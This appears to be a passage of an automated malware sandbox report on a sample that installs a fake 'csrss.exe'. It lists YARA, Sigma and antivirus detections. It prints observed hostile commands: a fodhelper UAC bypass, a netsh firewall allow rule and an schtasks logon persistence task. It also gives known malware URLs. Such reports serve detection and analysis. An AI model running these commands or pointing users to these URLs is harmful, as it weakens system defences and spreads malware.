34.2.csrss.exe.5700e50.11.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.3.4t4y4r89UZ.exe.5e940e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.2.4t4y4r89UZ.exe.400000.2.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
42.2.csrss.exe.5700e50.11.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
34.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.4t4y4r89UZ.exe.400000.3.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
16.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.5700e50.9.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.2.csrss.exe.9a56e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.5ca4f30.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
34.2.csrss.exe.400000.3.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
14.3.csrss.exe.6559a80.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.2.csrss.exe.400000.2.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
10.2.4t4y4r89UZ.exe.400000.2.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.4t4y4r89UZ.exe.55ea8d0.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.2.csrss.exe.400000.2.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
16.2.csrss.exe.400000.1.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
23.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.4t4y4r89UZ.exe.400000.3.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
23.2.csrss.exe.9a56e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.2.csrss.exe.5700e50.10.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.2.csrss.exe.5700e50.9.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
42.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
14.2.csrss.exe.5ca4f30.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
42.2.csrss.exe.5700e50.11.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.4t4y4r89UZ.exe.5040e50.11.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.2.csrss.exe.5caa8d0.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.5700e50.9.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
34.3.csrss.exe.65540e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.9ab080.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.2.csrss.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.5caa8d0.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.3.4t4y4r89UZ.exe.5880000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
14.3.csrss.exe.65540e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
34.3.csrss.exe.655bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.4t4y4r89UZ.exe.9ab080.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.2.4t4y4r89UZ.exe.9ab080.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.3.csrss.exe.655bce0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
14.2.csrss.exe.400000.0.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
23.2.csrss.exe.5700e50.10.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.4t4y4r89UZ.exe.5040e50.11.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
42.2.csrss.exe.400000.1.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
50.2.csrss.exe.5700e50.9.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
14.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.3.4t4y4r89UZ.exe.58f0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
14.2.csrss.exe.400000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
42.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
Click to see the 99 entries

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe /305-305, CommandLine: C:\Windows\rss\csrss.exe /305-305, CommandLine|base64offset|contains: }9}9, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentImage: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentProcessId: 5300, ProcessCommandLine: C:\Windows\rss\csrss.exe /305-305, ProcessId: 3192

Sigma detected: Bypass UAC via Fodhelper.exe

Show sources

Source: Process started

Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "C:\Windows\rss\csrss.exe" , CommandLine: "C:\Windows\rss\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Windows\system32\fodhelper.exe" , ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 6016, ProcessCommandLine: "C:\Windows\rss\csrss.exe" , ProcessId: 5360

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2012, ProcessCommandLine: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes, ProcessId: 7080

Sigma detected: Conhost Parent Process Executions

Show sources

Source: Process started

Author: omkar72: Data: Command: C:\Windows\rss\csrss.exe, CommandLine: C:\Windows\rss\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7108, ProcessCommandLine: C:\Windows\rss\csrss.exe, ProcessId: 916

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\rss\csrss.exe /305-305, CommandLine: C:\Windows\rss\csrss.exe /305-305, CommandLine|base64offset|contains: }9}9, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentImage: C:\Users\user\Desktop\4t4y4r89UZ.exe, ParentProcessId: 5300, ProcessCommandLine: C:\Windows\rss\csrss.exe /305-305, ProcessId: 3192

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe /305-305, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 3192, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 4036

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: 4t4y4r89UZ.exe

Virustotal: Detection: 33%

Perma Link

Antivirus detection for URL or domain

Show sources

Source: https://runmodes.com/api/log	Avira URL Cloud: Label: malware
Source: http://newscommer.com/app/app.exe	URL Reputation: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Windows\windefender.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.eocey
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Avira: detection malicious, Label: TR/Redcap.gsjan

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	Metadefender: Detection: 45%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	Metadefender: Detection: 13%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe	ReversingLabs: Detection: 73%
Source: C:\Windows\rss\csrss.exe	ReversingLabs: Detection: 38%
Source: C:\Windows\windefender.exe	Metadefender: Detection: 28%	Perma Link
Source: C:\Windows\windefender.exe	ReversingLabs: Detection: 78%

Machine Learning detection for sample

Show sources

Source: 4t4y4r89UZ.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Windows\rss\csrss.exe

Joe Sandbox ML: detected

Source: 14.3.csrss.exe.1694ea00.16.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.csrss.exe.16c44000.16.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Unpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe	Unpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 14.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 23.2.csrss.exe.400000.2.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 34.2.csrss.exe.400000.3.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 42.2.csrss.exe.400000.1.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.0.unpack
Source: C:\Windows\rss\csrss.exe	Unpacked PE file: 50.2.csrss.exe.400000.0.unpack

Source: 4t4y4r89UZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\4t4y4r89UZ.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source:	Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: symsrv.pdb source: csrss.exe
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
